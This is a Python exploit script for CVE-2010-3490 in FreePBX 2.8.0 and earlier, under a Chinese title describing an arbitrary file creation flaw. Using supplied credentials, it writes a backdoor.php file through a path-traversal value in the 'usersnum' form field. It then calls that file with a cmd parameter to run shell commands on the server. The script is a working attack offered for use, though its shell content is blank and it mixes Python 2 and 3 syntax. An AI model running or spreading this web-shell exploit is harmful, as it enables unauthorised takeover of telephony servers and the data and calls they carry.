CVE-2010-3490_FreePBX_2.8.0任意文件創建漏洞

# CVE-2010-3490 FreePBX 2.8.0任意文件創建漏洞
==EXP==

import requests
import random
import string
import sys
 
# Original advisory : http://www.exploit-db.com/exploits/15098/
 
print("devloop exploit for FreePBX <= 2.8.0 (CVE-2010-3490)")
if len(sys.argv) != 4:
    print("Usage: {0}   ")
    sys.exit()
 
BASE = sys.argv[1]
USER = sys.argv[2]
PASS = sys.argv[3]
KEYW = "devloop"
 
if not BASE.endswith("/"):
    BASE += "/"
 
sess = requests.session()
creds = (USER, PASS)
 
r = sess.get(BASE + "config.php", auth=creds)
if "Logged in:" in r.content:
    print("[+] Connection successful")
else:
    print("[!] Unable to login... check credentials and url")
    sys.exit()
 
data = {
    'action': 'recorded',
    'display': 'recordings',
    'usersnum': '../../../../../var/www/html/admin/{0}'.format(KEYW),
    'rname': "".join([random.choice(string.hexdigits) for _ in xrange(10)]),
    'Submit': 'Save'
    }
 
content = ""
files = {
        'ivrfile': ('backdoor.php', content, 'application/octet-stream')
        }
hdrs = {"referer": BASE + "config.php?type=setup&display=recordings"}
 
r = sess.post(BASE + "config.php?type=setup&display=recordings",
        data=data,
        files=files,
        auth=creds,
        headers=hdrs)
 
print("[i] Testing shell at address {0}{1}-ivrrecording.php".format(BASE, KEYW))
r = requests.get(BASE + KEYW + "-ivrrecording.php?cmd=uname+-a", auth=creds)
if r.status_code != 200:
    print("[-] Received HTTP code {0} for this url".format(r.status_code))
else:
    print("HTTP 200 OK")
    print r.content